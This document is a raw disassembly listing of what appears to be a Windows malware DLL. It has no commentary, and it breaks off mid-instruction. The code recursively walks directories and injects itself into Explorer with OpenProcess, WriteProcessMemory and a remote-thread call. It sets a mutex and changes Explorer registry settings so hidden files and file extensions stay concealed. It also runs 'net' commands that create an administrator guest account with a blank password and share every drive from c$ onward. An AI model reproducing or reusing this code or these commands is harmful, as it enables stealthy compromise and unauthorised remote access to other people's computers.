random_numgen proc near ; CODE XREF: sub_36171A7B+80p 36171B06 36171B06 arg_0 = dword ptr 4 36171B06 36171B06 call ds:rand 36171B0C imul eax, 64h 36171B0F cdq 36171B10 mov ecx, 7FFFh 36171B15 idiv ecx 36171B17 inc eax 36171B18 mov dword_3617D4B8, eax 36171B1D 36171B1D loc_36171B1D: ; CODE XREF: random_numgen+24j 36171B1D push [esp+arg_0] 36171B21 call sub_36171B36 36171B26 cmp eax, 63h 36171B29 pop ecx 36171B2A jz short loc_36171B1D 36171B2C xor ecx, ecx 36171B2E test eax, eax 36171B30 setnz cl 36171B33 mov eax, ecx 36171B35 retn 36171B35 random_numgen endp 36171B35 36171B36 36171B36 ; ███████████████ S U B R O U T I N E ███████████████████████████████████████ 36171B36 36171B36 ; Attributes: bp-based frame 36171B36 36171B36 sub_36171B36 proc near ; CODE XREF: random_numgen+1Bp 36171B36 ; sub_36171B36+F1p ... 36171B36 36171B36 var_164 = dword ptr -164h 36171B36 var_148 = byte ptr -148h 36171B36 var_11C = byte ptr -11Ch 36171B36 var_8 = dword ptr -8 36171B36 var_4 = dword ptr -4 36171B36 arg_0 = dword ptr 8 36171B36 36171B36 push ebp 36171B37 mov ebp, esp 36171B39 sub esp, 148h 36171B3F push ebx 36171B40 push esi 36171B41 and [ebp+var_4], 0 36171B45 mov esi, 400h 36171B4A push esi 36171B4B push 8 36171B4D push dword_3617ACB4 36171B53 call dword_3617AC74 36171B59 mov ebx, eax 36171B5B test ebx, ebx 36171B5D jz loc_36171D3F 36171B63 push edi 36171B64 push esi 36171B65 push [ebp+arg_0] 36171B68 push ebx 36171B69 call ds:strncpy 36171B6F push ebx 36171B70 call sub_3617186E 36171B75 push [ebp+arg_0] 36171B78 call _strlen 36171B7D mov edi, ds:strncat 36171B83 mov ecx, esi 36171B85 sub ecx, eax 36171B87 push ecx 36171B88 push offset a_ ; "\\*.*" 36171B8D push ebx 36171B8E call edi ; strncat 36171B90 add esp, 20h 36171B93 lea eax, [ebp+var_148] 36171B99 push eax 36171B9A push ebx 36171B9B call ds:FindFirstFileA 36171BA1 cmp eax, 0FFFFFFFFh 36171BA4 mov [ebp+var_8], eax 36171BA7 jnz short loc_36171BB0 36171BA9 xor esi, esi 36171BAB jmp loc_36171D2D 36171BB0 ; ─────────────────────────────────────────────────────────────────────────── 36171BB0 36171BB0 loc_36171BB0: ; CODE XREF: sub_36171B36+71j 36171BB0 lea eax, [ebp+var_11C] 36171BB6 push eax 36171BB7 call ds:_strlwr 36171BBD lea eax, [ebp+var_11C] 36171BC3 mov [esp+164h+var_164], offset dot ; "." 36171BCA push eax 36171BCB call _strcmp 36171BD0 pop ecx 36171BD1 test eax, eax 36171BD3 pop ecx 36171BD4 jz loc_36171C75 36171BDA lea eax, [ebp+var_11C] 36171BE0 push offset a__ ; ".." 36171BE5 push eax 36171BE6 call _strcmp 36171BEB pop ecx 36171BEC test eax, eax 36171BEE pop ecx 36171BEF jz loc_36171C75 36171BF5 test [ebp+var_148], 10h 36171BFC jz short loc_36171C40 36171BFE push ebx 36171BFF call _strlen 36171C04 mov ecx, esi 36171C06 sub ecx, eax 36171C08 push ecx 36171C09 push offset asc_36179474 ; "\\" 36171C0E push ebx 36171C0F call edi ; strncat 36171C11 push ebx 36171C12 call _strlen 36171C17 mov ecx, esi 36171C19 sub ecx, eax 36171C1B lea eax, [ebp+var_11C] 36171C21 push ecx 36171C22 push eax 36171C23 push ebx 36171C24 call edi ; strncat 36171C26 push ebx 36171C27 call sub_36171B36 36171C2C add esp, 24h 36171C2F jmp loc_36171D13 36171C34 ; ─────────────────────────────────────────────────────────────────────────── 36171C34 36171C34 loc_36171C34: ; CODE XREF: sub_36171B36+1E2j 36171C34 push 63h 36171C36 pop ecx 36171C37 cmp eax, ecx 36171C39 jnz short loc_36171C75 36171C3B mov [ebp+var_4], ecx 36171C3E jmp short loc_36171C75 36171C40 ; ─────────────────────────────────────────────────────────────────────────── 36171C40 36171C40 loc_36171C40: ; CODE XREF: sub_36171B36+C6j 36171C40 ; sub_36171B36+19Bj 36171C40 lea eax, [ebp+var_11C] 36171C46 push eax 36171C47 call _strlen 36171C4C cmp eax, 4 36171C4F pop ecx 36171C50 jbe short loc_36171C75 36171C52 lea eax, [ebp+var_11C] 36171C58 push eax 36171C59 push [ebp+arg_0] 36171C5C call sub_36171D43 36171C61 pop ecx 36171C62 pop ecx 36171C63 push 1 36171C65 pop ecx 36171C66 cmp eax, ecx 36171C68 jz loc_36171D1E 36171C6E mov [ebp+var_4], 63h 36171C75 36171C75 loc_36171C75: ; CODE XREF: sub_36171B36+9Ej 36171C75 ; sub_36171B36+B9j ... 36171C75 lea eax, [ebp+var_148] 36171C7B push eax 36171C7C push [ebp+var_8] 36171C7F call ds:FindNextFileA 36171C85 test eax, eax 36171C87 jz loc_36171D21 36171C8D lea eax, [ebp+var_11C] 36171C93 push eax 36171C94 call ds:_strlwr 36171C9A lea eax, [ebp+var_11C] 36171CA0 mov [esp+164h+var_164], offset dot ; "." 36171CA7 push eax 36171CA8 call _strcmp 36171CAD pop ecx 36171CAE test eax, eax 36171CB0 pop ecx 36171CB1 jz short loc_36171C75 36171CB3 lea eax, [ebp+var_11C] 36171CB9 push offset a__ ; ".." 36171CBE push eax 36171CBF call _strcmp 36171CC4 pop ecx 36171CC5 test eax, eax 36171CC7 pop ecx 36171CC8 jz short loc_36171C75 36171CCA test [ebp+var_148], 10h 36171CD1 jz loc_36171C40 36171CD7 push esi 36171CD8 push [ebp+arg_0] 36171CDB push ebx 36171CDC call ds:strncpy 36171CE2 push ebx 36171CE3 call _strlen 36171CE8 mov ecx, esi 36171CEA sub ecx, eax 36171CEC push ecx 36171CED push offset asc_36179474 ; "\\" 36171CF2 push ebx 36171CF3 call edi 36171CF5 push ebx 36171CF6 call _strlen 36171CFB mov ecx, esi 36171CFD sub ecx, eax 36171CFF lea eax, [ebp+var_11C] 36171D05 push ecx 36171D06 push eax 36171D07 push ebx 36171D08 call edi 36171D0A push ebx 36171D0B call sub_36171B36 36171D10 add esp, 30h 36171D13 36171D13 loc_36171D13: ; CODE XREF: sub_36171B36+F9j 36171D13 push 1 36171D15 pop ecx 36171D16 cmp eax, ecx 36171D18 jnz loc_36171C34 36171D1E 36171D1E loc_36171D1E: ; CODE XREF: sub_36171B36+132j 36171D1E mov [ebp+var_4], ecx 36171D21 36171D21 loc_36171D21: ; CODE XREF: sub_36171B36+151j 36171D21 push [ebp+var_8] 36171D24 call ds:FindClose 36171D2A mov esi, [ebp+var_4] 36171D2D 36171D2D loc_36171D2D: ; CODE XREF: sub_36171B36+75j 36171D2D push ebx 36171D2E push 0 36171D30 push dword_3617ACB4 36171D36 call dword_3617AC70 36171D3C mov eax, esi 36171D3E pop edi 36171D3F 36171D3F loc_36171D3F: ; CODE XREF: sub_36171B36+27j 36171D3F pop esi 36171D40 pop ebx 36171D41 leave 36171D42 retn 36171D42 sub_36171B36 endp 36171D42 36171D43 36171D43 ; ███████████████ S U B R O U T I N E ███████████████████████████████████████ 36171D43 36171D43 36171D43 sub_36171D43 proc near ; CODE XREF: sub_36171B36+126p 36171D43 36171D43 arg_0 = dword ptr 4 36171D43 arg_4 = dword ptr 8 36171D43 36171D43 dec dword_3617D4B8 36171D49 jns short loc_36171D79 36171D4B push esi 36171D4C push edi 36171D4D mov esi, ds:strncpy 36171D53 mov edi, 400h 36171D58 push edi 36171D59 push [esp+0Ch+arg_4] 36171D5D push offset byte_3617A818 36171D62 call esi ; strncpy 36171D64 push edi 36171D65 push [esp+18h+arg_0] 36171D69 push offset byte_3617A418 36171D6E call esi ; strncpy 36171D70 add esp, 18h 36171D73 push 1 36171D75 pop eax 36171D76 pop edi 36171D77 pop esi 36171D78 retn 36171D79 ; ─────────────────────────────────────────────────────────────────────────── 36171D79 36171D79 loc_36171D79: ; CODE XREF: sub_36171D43+6j 36171D79 xor eax, eax 36171D7B retn 36171D7B sub_36171D43 endp 36171D7B 36171D7C 36171D7C ; ███████████████ S U B R O U T I N E ███████████████████████████████████████ 36171D7C 36171D7C ; Attributes: bp-based frame 36171D7C 36171D7C sub_36171D7C proc near ; CODE XREF: _DllMain@12+18Ap 36171D7C 36171D7C var_B0 = byte ptr -0B0h 36171D7C var_A7 = byte ptr -0A7h 36171D7C var_30 = byte ptr -30h 36171D7C var_2C = byte ptr -2Ch 36171D7C var_20 = dword ptr -20h 36171D7C var_18 = dword ptr -18h 36171D7C var_10 = byte ptr -10h 36171D7C var_C = byte ptr -0Ch 36171D7C var_8 = dword ptr -8 36171D7C var_4 = dword ptr -4 36171D7C 36171D7C push ebp 36171D7D mov ebp, esp 36171D7F sub esp, 0B0h 36171D85 push ebx 36171D86 push esi 36171D87 push edi 36171D88 mov esi, offset explorer ; "EXPLORER" 36171D8D lea edi, [ebp+var_B0] 36171D93 push 1Dh 36171D95 movsd 36171D96 movsd 36171D97 movsb 36171D98 pop ecx 36171D99 xor eax, eax 36171D9B lea edi, [ebp+var_A7] 36171DA1 xor ebx, ebx 36171DA3 repe stosd 36171DA5 cmp dword_3617ACB0, ebx 36171DAB stosw 36171DAD stosb 36171DAE jz loc_36171EEF 36171DB4 call sub_36172230 36171DB9 mov edi, eax 36171DBB cmp edi, ebx 36171DBD mov esi, edi 36171DBF jz loc_36171EFE 36171DC5 36171DC5 loc_36171DC5: ; CODE XREF: sub_36171D7C+66j 36171DC5 lea eax, [ebp+var_B0] 36171DCB push eax 36171DCC lea eax, [esi+8] 36171DCF push eax 36171DD0 call ds:lstrcmpiA 36171DD6 test eax, eax 36171DD8 jz short loc_36171DE4 36171DDA mov esi, [esi+110h] 36171DE0 cmp esi, ebx 36171DE2 jnz short loc_36171DC5 36171DE4 36171DE4 loc_36171DE4: ; CODE XREF: sub_36171D7C+5Cj 36171DE4 cmp esi, ebx 36171DE6 jz loc_36171EFE 36171DEC mov esi, [esi] 36171DEE push edi 36171DEF call sub_3617223F 36171DF4 pop ecx 36171DF5 call ds:GetCurrentProcessId 36171DFB cmp eax, esi 36171DFD jz loc_36171EFE 36171E03 push esi 36171E04 push ebx 36171E05 push 1F0FFFh 36171E0A call ds:OpenProcess 36171E10 mov edi, eax 36171E12 cmp edi, ebx 36171E14 jz loc_36171EFE 36171E1A push 8000h 36171E1F push ebx 36171E20 push dword_3617ACAC 36171E26 push edi 36171E27 call dword_3617D5D8 36171E2D mov eax, dword_3617ACAC 36171E32 push 40h 36171E34 push 3000h 36171E39 mov ecx, [eax+3Ch] 36171E3C mov ecx, [ecx+eax+50h] 36171E40 push ecx 36171E41 push eax 36171E42 push edi 36171E43 call dword_3617D5DC 36171E49 cmp eax, ebx 36171E4B mov [ebp+var_4], eax 36171E4E jz loc_36171EFE 36171E54 lea ecx, [ebp+var_2C] 36171E57 push 1Ch 36171E59 push ecx 36171E5A push eax 36171E5B push edi 36171E5C call dword_3617D5D4 36171E62 cmp [ebp+var_18], 1 36171E66 jz short loc_36171EC9 36171E68 mov esi, 1000h 36171E6D 36171E6D loc_36171E6D: ; CODE XREF: sub_36171D7C+14Bj 36171E6D mov eax, [ebp+var_20] 36171E70 cmp eax, ebx 36171E72 jz short loc_36171EC9 36171E74 test byte ptr [ebp+var_18+1], 1 36171E78 jnz short loc_36171EB0 36171E7A cmp eax, ebx 36171E7C mov [ebp+var_8], ebx 36171E7F jbe short loc_36171EB0 36171E81 mov ebx, [ebp+var_4] 36171E84 36171E84 loc_36171E84: ; CODE XREF: sub_36171D7C+130j 36171E84 lea eax, [ebp+var_30] 36171E87 push eax 36171E88 push 40h 36171E8A push esi 36171E8B push ebx 36171E8C push edi 36171E8D call dword_3617D5D0 36171E93 lea eax, [ebp+var_C] 36171E96 push eax 36171E97 push esi 36171E98 push ebx 36171E99 push ebx 36171E9A push edi 36171E9B call ds:WriteProcessMemory 36171EA1 add [ebp+var_8], esi 36171EA4 mov eax, [ebp+var_20] 36171EA7 add ebx, esi 36171EA9 cmp [ebp+var_8], eax 36171EAC jb short loc_36171E84 36171EAE xor ebx, ebx 36171EB0 36171EB0 loc_36171EB0: ; CODE XREF: sub_36171D7C+FCj 36171EB0 ; sub_36171D7C+103j 36171EB0 add [ebp+var_4], eax 36171EB3 lea eax, [ebp+var_2C] 36171EB6 push 1Ch 36171EB8 push eax 36171EB9 push [ebp+var_4] 36171EBC push edi 36171EBD call dword_3617D5D4 36171EC3 cmp [ebp+var_18], 1 36171EC7 jnz short loc_36171E6D 36171EC9 36171EC9 loc_36171EC9: ; CODE XREF: sub_36171D7C+EAj 36171EC9 ; sub_36171D7C+F6j 36171EC9 lea eax, [ebp+var_10] 36171ECC push eax 36171ECD push ebx 36171ECE push dword_3617ACAC 36171ED4 push offset sub_36171F05 36171ED9 push ebx 36171EDA push ebx 36171EDB push edi 36171EDC call dword_3617D5E0 36171EE2 test eax, eax 36171EE4 jz short loc_36171EFE 36171EE6 push edi 36171EE7 call ds:CloseHandle 36171EED jmp short loc_36171EFE 36171EEF ; ─────────────────────────────────────────────────────────────────────────── 36171EEF 36171EEF loc_36171EEF: ; CODE XREF: sub_36171D7C+32j 36171EEF push 1 36171EF1 call ds:GetCurrentProcessId 36171EF7 push eax 36171EF8 call dword_3617D5CC 36171EFE 36171EFE loc_36171EFE: ; CODE XREF: sub_36171D7C+43j 36171EFE ; sub_36171D7C+6Aj ... 36171EFE pop edi 36171EFF pop esi 36171F00 xor eax, eax 36171F02 pop ebx 36171F03 leave 36171F04 retn 36171F04 sub_36171D7C endp 36171F04 36171F05 36171F05 ; ███████████████ S U B R O U T I N E ███████████████████████████████████████ 36171F05 36171F05 36171F05 sub_36171F05 proc near ; CODE XREF: _DllMain@12+1A1p 36171F05 ; DATA XREF: sub_36171D7C+158o 36171F05 36171F05 var_1AC = dword ptr -1ACh 36171F05 var_1A0 = byte ptr -1A0h 36171F05 36171F05 sub esp, 194h 36171F0B push ebx 36171F0C push ebp 36171F0D push esi 36171F0E push edi 36171F0F call K32_imports 36171F14 xor edi, edi 36171F16 push offset aFsdhqherwqi200 ; "fsdhqherwqi2001" 36171F1B push edi 36171F1C push edi 36171F1D call ds:CreateMutexA 36171F23 push 0FFFFFFFFh 36171F25 mov esi, eax 36171F27 call ds:GetCurrentThread 36171F2D push eax 36171F2E call ds:SetThreadPriority 36171F34 mov eax, dword_3617ACB4 36171F39 cmp eax, edi 36171F3B jz short loc_36171F44 36171F3D push eax 36171F3E call dword_3617AC78 36171F44 36171F44 loc_36171F44: ; CODE XREF: sub_36171F05+36j 36171F44 push edi 36171F45 push 80000h 36171F4A push edi 36171F4B call dword_3617AC7C 36171F51 cmp eax, edi 36171F53 mov dword_3617ACB4, eax 36171F58 jnz short loc_36171F70 36171F5A push esi 36171F5B call ds:CloseHandle 36171F61 pop edi 36171F62 pop esi 36171F63 pop ebp 36171F64 xor eax, eax 36171F66 pop ebx 36171F67 add esp, 194h 36171F6D retn 4 36171F70 ; ─────────────────────────────────────────────────────────────────────────── 36171F70 36171F70 loc_36171F70: ; CODE XREF: sub_36171F05+53j 36171F70 lea eax, [esp+1B4h+var_1A0] 36171F74 push eax 36171F75 push 202h 36171F7A call dword_3617AC68 36171F80 call ds:GetTickCount 36171F86 push eax 36171F87 call ds:srand 36171F8D pop ecx 36171F8E call sub_361737C9 36171F93 mov ebx, ds:Sleep 36171F99 mov ebp, 7530h 36171F9E push ebp 36171F9F call ebx ; Sleep 36171FA1 cmp dword_3617ACB0, edi 36171FA7 jz short loc_36171FCB 36171FA9 call sub_36176F10 36171FAE mov eax, dword_3617D708 36171FB3 cmp eax, edi 36171FB5 jnz short loc_36171FBB 36171FB7 push 3Ch 36171FB9 jmp short loc_36171FC5 36171FBB ; ─────────────────────────────────────────────────────────────────────────── 36171FBB 36171FBB loc_36171FBB: ; CODE XREF: sub_36171F05+B0j 36171FBB cmp eax, 63h 36171FBE jnz short loc_36171FCB 36171FC0 push 0C8h 36171FC5 36171FC5 loc_36171FC5: ; CODE XREF: sub_36171F05+B4j 36171FC5 call sub_36172D72 36171FCA pop ecx 36171FCB 36171FCB loc_36171FCB: ; CODE XREF: sub_36171F05+A2j 36171FCB ; sub_36171F05+B9j 36171FCB mov esi, ds:HeapCompact 36171FD1 36171FD1 loc_36171FD1: ; CODE XREF: sub_36171F05+163j 36171FD1 push ebp 36171FD2 call ebx ; Sleep 36171FD4 cmp dword_3617ACB0, edi 36171FDA jz short loc_36171FFA 36171FDC cmp dword_3617D708, 63h 36171FE3 jnz short loc_36171FEA 36171FE5 call sub_36173325 36171FEA 36171FEA loc_36171FEA: ; CODE XREF: sub_36171F05+DEj 36171FEA push edi 36171FEB push dword_3617ACB4 36171FF1 call esi ; HeapCompact 36171FF3 call sub_36174E10 36171FF8 jmp short loc_36171FFF 36171FFA ; ─────────────────────────────────────────────────────────────────────────── 36171FFA 36171FFA loc_36171FFA: ; CODE XREF: sub_36171F05+D5j 36171FFA call sub_36176C52 36171FFF 36171FFF loc_36171FFF: ; CODE XREF: sub_36171F05+F3j 36171FFF push edi 36172000 push dword_3617ACB4 36172006 call esi ; HeapCompact 36172008 call sub_36174F1E 3617200D push edi 3617200E push dword_3617ACB4 36172014 call esi ; HeapCompact 36172016 push edi 36172017 call sub_36176D58 3617201C push edi 3617201D push dword_3617ACB4 36172023 call esi ; HeapCompact 36172025 cmp dword_3617ACB0, edi 3617202B jz short loc_3617203B 3617202D cmp dword_3617D708, 63h 36172034 jz short loc_3617203B 36172036 call sub_36173325 3617203B 3617203B loc_3617203B: ; CODE XREF: sub_36171F05+126j 3617203B ; sub_36171F05+12Fj 3617203B call sub_3617548D 36172040 push edi 36172041 push dword_3617ACB4 36172047 call esi ; HeapCompact 36172049 call sub_3617206D 3617204E mov [esp+1BCh+var_1AC], 18h 36172056 36172056 loc_36172056: ; CODE XREF: sub_36171F05+15Aj 36172056 call sub_36176E91 3617205B dec [esp+1BCh+var_1AC] 3617205F jnz short loc_36172056 36172061 push 2BF20h 36172066 call ebx ; Sleep 36172068 jmp loc_36171FD1 36172068 sub_36171F05 endp 36172068 3617206D 3617206D ; ███████████████ S U B R O U T I N E ███████████████████████████████████████ 3617206D 3617206D ; Attributes: bp-based frame 3617206D 3617206D sub_3617206D proc near ; CODE XREF: sub_36171F05+144p 3617206D 3617206D var_328 = byte ptr -328h 3617206D var_128 = byte ptr -128h 3617206D var_28 = byte ptr -28h 3617206D var_22 = byte ptr -22h 3617206D var_1F = byte ptr -1Fh 3617206D var_18 = dword ptr -18h 3617206D var_14 = dword ptr -14h 3617206D var_10 = dword ptr -10h 3617206D var_C = dword ptr -0Ch 3617206D var_8 = dword ptr -8 3617206D var_1 = byte ptr -1 3617206D 3617206D push ebp 3617206E mov ebp, esp 36172070 sub esp, 328h 36172076 push ebx 36172077 push esi 36172078 lea eax, [ebp+var_C] 3617207B push edi 3617207C push eax 3617207D xor ebx, ebx 3617207F push 0F003Fh 36172084 push ebx 36172085 push offset aSoftwareMicr_0 ; "Software\\Microsoft\\Windows\\CurrentVersi"... 3617208A push 80000001h 3617208F call ds:RegOpenKeyExA 36172095 test eax, eax 36172097 jnz short loc_361720E8 36172099 push 4 3617209B lea eax, [ebp+var_8] 3617209E pop edi 3617209F mov esi, ds:RegSetValueExA 361720A5 push edi 361720A6 push eax 361720A7 push edi 361720A8 push ebx 361720A9 push offset aHidden ; "Hidden" 361720AE mov [ebp+var_8], ebx 361720B1 push [ebp+var_C] 361720B4 call esi ; RegSetValueExA 361720B6 lea eax, [ebp+var_8] 361720B9 push edi 361720BA push eax 361720BB push edi 361720BC push ebx 361720BD push offset aShowsuperhidde ; "ShowSuperHidden" 361720C2 push [ebp+var_C] 361720C5 call esi ; RegSetValueExA 361720C7 lea eax, [ebp+var_8] 361720CA push edi 361720CB push eax 361720CC push edi 361720CD push ebx 361720CE push offset aHidefileext ; "HideFileExt" 361720D3 push [ebp+var_C] 361720D6 mov [ebp+var_8], 1 361720DD call esi ; RegSetValueExA 361720DF push [ebp+var_C] 361720E2 call ds:RegCloseKey 361720E8 361720E8 loc_361720E8: ; CODE XREF: sub_3617206D+2Aj 361720E8 cmp dword_3617ACB0, ebx 361720EE jz loc_3617222B 361720F4 push ebx 361720F5 push ebx 361720F6 mov esi, offset aNet ; "net" 361720FB push offset aUserGuestAdd ; "user guest /add" 36172100 mov edi, offset aOpen ; "open" 36172105 push esi 36172106 push edi 36172107 push ebx 36172108 call dword_3617AC94 3617210E push ebx 3617210F push ebx 36172110 push offset aUserGuestActiv ; "user guest /active" 36172115 push esi 36172116 push edi 36172117 push ebx 36172118 call dword_3617AC94 3617211E push ebx 3617211F push ebx 36172120 push offset aLocalgroupGues ; "localgroup Guests guest /add" 36172125 push esi 36172126 push edi 36172127 push ebx 36172128 call dword_3617AC94 3617212E push ebx 3617212F push ebx 36172130 push offset aLocalgroupAdmi ; "localgroup Administrators guest /add" 36172135 push esi 36172136 push edi 36172137 push ebx 36172138 call dword_3617AC94 3617213E push ebx 3617213F push ebx 36172140 push offset aUserGuest ; "user guest \"\"" 36172145 push esi 36172146 push edi 36172147 push ebx 36172148 call dword_3617AC94 3617214E mov al, 63h 36172150 mov [ebp+var_1], al 36172153 jmp short loc_36172158 36172155 ; ─────────────────────────────────────────────────────────────────────────── 36172155 36172155 loc_36172155: ; CODE XREF: sub_3617206D+11Ej 36172155 mov al, [ebp+var_1] 36172158 36172158 loc_36172158: ; CODE XREF: sub_3617206D+E6j 36172158 mov esi, offset aShareCC ; "share c$=c:\\" 3617215D lea edi, [ebp+var_28] 36172160 movsd 36172161 movsd 36172162 movsd 36172163 movsb 36172164 mov [ebp+var_22], al 36172167 mov [ebp+var_1F], al 3617216A push ebx 3617216B lea eax, [ebp+var_28] 3617216E push ebx 3617216F push eax 36172170 push offset aNet ; "net" 36172175 push offset aOpen ; "open" 3617217A push ebx 3617217B call dword_3617AC94 36172181 inc [ebp+var_1] 36172184 mov al, [ebp+var_1] 36172187 sub al, 63h 36172189 cmp al, 18h 3617218B jl short loc_36172155 3617218D lea eax, [ebp+var_8] 36172190 mov edi, 1FEh 36172195 push eax 36172196 push 0F003Fh 3617219B push ebx 3617219C push offset aSystemCurren_2 ; "SYSTEM\\CurrentControlSet\\Services\\lanma"... 361721A1 push 80000002h 361721A6 mov [ebp+var_10], 0FFh 361721AD mov [ebp+var_14], edi 361721B0 call ds:RegOpenKeyExA 361721B6 test eax, eax 361721B8 jnz short loc_3617222B 361721BA lea eax, [ebp+var_14] 361721BD mov esi, ds:RegEnumValueA 361721C3 push eax 361721C4 lea eax, [ebp+var_328] 361721CA push eax 361721CB push ebx 361721CC lea eax, [ebp+var_10] 361721CF push ebx 361721D0 push eax 361721D1 lea eax, [ebp+var_128] 361721D7 push eax 361721D8 push ebx 361721D9 push [ebp+var_8] 361721DC mov [ebp+var_18], ebx 361721DF 361721DF loc_361721DF: ; CODE XREF: sub_3617206D+1B3j 361721DF call esi ; RegEnumValueA 361721E1 test eax, eax 361721E3 jnz short loc_36172222 361721E5 lea eax, [ebp+var_128] 361721EB push eax 361721EC push [ebp+var_8] 361721EF call ds:RegDeleteKeyA 361721F5 lea eax, [ebp+var_14] 361721F8 inc [ebp+var_18] 361721FB push eax 361721FC lea eax, [ebp+var_328] 36172202 push eax 36172203 push ebx 36172204 lea eax, [ebp+var_10] 36172207 push ebx 36172208 push eax 36172209 lea eax, [ebp+var_128] 3617220F push eax 36172210 mov [ebp+var_10], 0FFh 36172217 push [ebp+var_18] 3617221A mov [ebp+var_14], edi 3617221D push [ebp+var_8] 36172220 jmp short loc_361721DF 36172222 ; ─────────────────────────────────────────────────────────────────────────── 36172222 36172222 loc_36172222: ; CODE XREF: sub_3617206D+176j 36172222 push [ebp+var_8] 36172225 call ds:RegCloseKey 3617222B 3617222B loc_3617222B: ; CODE XREF: sub_3617206D+81j 3617222B ; sub_3617206D+14Bj 3617222B pop edi 3617222C pop esi 3617222D pop ebx 3617222E leave 3617222F retn 3617222F sub_3617206D endp 3617222F 36172230 36172230 ; ███████████████ S U B R O U T I N E ███████████████████████████████████████ 36172230 36172230 36172230 sub_36172230 proc near ; CODE XREF: sub_36171D7C+38p 36172230 call sub_36172278 36172235 test eax, eax 36172237 jnz short loc_3617223A 36172239 retn 3617223A ; ─────────────────────────────────────────────────────────────────────────── 3617223A 3617223A loc_3617223A: ; CODE XREF: sub_36172230+7j 3617223A jmp loc_36172286 3617223A sub_36172230 endp 3617223A 3617223F 3617223F ; ███████████████ S U B R O U T I N E ███████████████████████████████████████ 3617223F 3617223F 3617223F sub_3617223F proc near ; CODE XREF: sub_36171D7C+73p 3617223F 3617223F arg_0 = dword ptr 8 3617223F 3617223F push esi 36172240 mov esi, [esp+arg_0] 36172244 test esi, esi 36172246 jz short loc_36172276 36172248 push ebx 36172249 mov ebx, ds:free 3617224F push edi 36172250 36172250 loc_36172250: ; CODE XREF: sub_3617223F+33j 36172250 mov eax, [esi+4] 36172253 test eax, eax 36172255 jz short loc_36172264 36172257 36172257 loc_36172257: ; CODE XREF: sub_3617223F+23j 36172257 mov edi, [eax+4] 3617225A push eax 3617225B call ebx ; free 3617225D test edi, edi 3617225F pop ecx 36172260 mov eax, edi 36172262 jnz short loc_36172257 36172264 36172264 loc_36172264: ; CODE XREF: sub_3617223F+16j 36172264 mov edi, [esi+110h] 3617226A push esi 3617226B call ebx ; free 3617226D test edi, edi 3617226F pop ecx 36172270 mov esi, edi 36172272 jnz short loc_36172250 36172274 pop edi 36172275 pop ebx 36172276 36172276 loc_36172276: ; CODE XREF: sub_3617223F+7j 36172276 pop esi 36172277 retn 36172277 sub_3617223F endp 36172277 36172278 36172278 ; ███████████████ S U B R O U T I N E ███████████████████████████████████████ 36172278 36172278 36172278 sub_36172278 proc near ; CODE XREF: sub_36172230p 36172278 call sub_361723F1 3617227D call sub_36172494 36172282 push 1 36172284 pop eax 36172285 retn 36172285 sub_36172278 endp 36172285 36172286 ; ─────────────────────────────────────────────────────────────────────────── 36172286 36172286 loc_36172286: ; CODE XREF: sub_36172230+Aj 36172286 push ebp 36172287 mov ebp, esp 36172289 sub esp, 128h 3617228F push ebx 36172290 push esi 36172291 lea eax, [ebp-14h] 36172294 push edi 36172295 xor ebx, ebx 36172297 push eax 36172298 push ebx 36172299 push offset byte_3617D604 3617229E push dword_36179484 361722A4 mov dword ptr [ebp-14h], 0C800h 361722AB call sub_36172A08 361722B0 push dword_3617D5C8 361722B6 mov [ebp-10h], eax 361722B9 mov [ebp-18h], ebx 361722BC push eax 361722BD call sub_36172A2B 361722C2 push dword_3617D5A8 361722C8 mov [ebp-4], eax 361722CB push eax 361722CC call sub_36172A5E 361722D1 push dword ptr [ebp-4] 361722D4 mov [ebp-0Ch], eax 361722D7 lea esi, [ebp-128h] 361722DD call sub_36172A91 361722E2 add esp, 24h 361722E5 mov edi, eax 361722E7 mov [ebp-8], ebx 361722EA 361722EA loc_361722EA: ; CODE XREF: .text:36172349j 361722EA cmp edi, ebx 361722EC jz short loc_3617234B 361722EE mov eax, [ebp-4] 361722F1 mov ecx, [ebp-8] 361722F4 cmp ecx, [eax+28h] 361722F7 jge short loc_3617234B 361722F9 push 114h 361722FE call ds:malloc 36172304 cmp eax, ebx 36172306 pop ecx 36172307 mov [esi+110h], eax 3617230D jz loc_361723E5 36172313 push dword ptr [ebp-0Ch] 36172316 mov esi, eax 36172318 push edi 36172319 call sub_36172AA2 3617231E mov eax, [eax] 36172320 push edi 36172321 mov [esi], eax 36172323 call sub_36172ABD 36172328 push eax 36172329 lea eax, [esi+8] 3617232C push offset aLs ; "%ls" 36172331 push eax 36172332 call ds:sprintf 36172338 push edi 36172339 mov [esi+4], ebx 3617233C call sub_36172ACE 36172341 add esp, 1Ch 36172344 inc dword ptr [ebp-8] 36172347 mov edi, eax 36172349 jmp short loc_361722EA 3617234B ; ─────────────────────────────────────────────────────────────────────────── 3617234B 3617234B loc_3617234B: ; CODE XREF: .text:361722ECj 3617234B ; .text:361722F7j 3617234B mov [esi+110h], ebx 36172351 push dword_3617D570 36172357 push dword ptr [ebp-10h] 3617235A call sub_36172A2B 3617235F push dword_3617D54C 36172365 mov [ebp-4], eax 36172368 push eax 36172369 call sub_36172A5E 3617236E push dword ptr [ebp-4] 36172371 mov [ebp-0Ch], eax 36172374 call sub_36172A91 36172379 add esp, 14h 3617237C and dword ptr [ebp-8], 0 36172380 mov ebx, eax 36172382 36172382 loc_36172382: ; CODE XREF: .text:361723E3j 36172382 test ebx, ebx 36172384 jz short loc_361723E9 36172386 mov ecx, [ebp-4] 36172389 mov eax, [ebp-8] 3617238C cmp eax, [ecx+28h] 3617238F jge short loc_361723E9 36172391 mov eax, [ebx+8] 36172394 mov edi, [ebp-18h] 36172397 xor ecx, ecx 36172399 test eax, eax 3617239B jle short loc_361723AC 3617239D 3617239D loc_3617239D: ; CODE XREF: .text:361723AAj 3617239D mov edi, [edi+110h] 361723A3 test edi, edi 361723A5 jz short loc_361723D7 361723A7 inc ecx 361723A8 cmp ecx, eax 361723AA jl short loc_3617239D 361723AC 361723AC loc_361723AC: ; CODE XREF: .text:3617239Bj 361723AC test edi, edi 361723AE jz short loc_361723D7 361723B0 push 8 361723B2 call ds:malloc 361723B8 mov esi, eax 361723BA pop ecx 361723BB test esi, esi 361723BD jz short loc_361723E5 361723BF push dword ptr [ebp-0Ch] 361723C2 mov eax, [edi+4] 361723C5 mov [esi+4], eax 361723C8 mov [edi+4], esi 361723CB push ebx 361723CC call sub_36172AA2 361723D1 mov eax, [eax] 361723D3 pop ecx 361723D4 pop ecx 361723D5 mov [esi], eax 361723D7 361723D7 loc_361723D7: ; CODE XREF: .text:361723A5j 361723D7 ; .text:361723AEj 361723D7 push ebx 361723D8 call sub_36172ACE 361723DD inc dword ptr 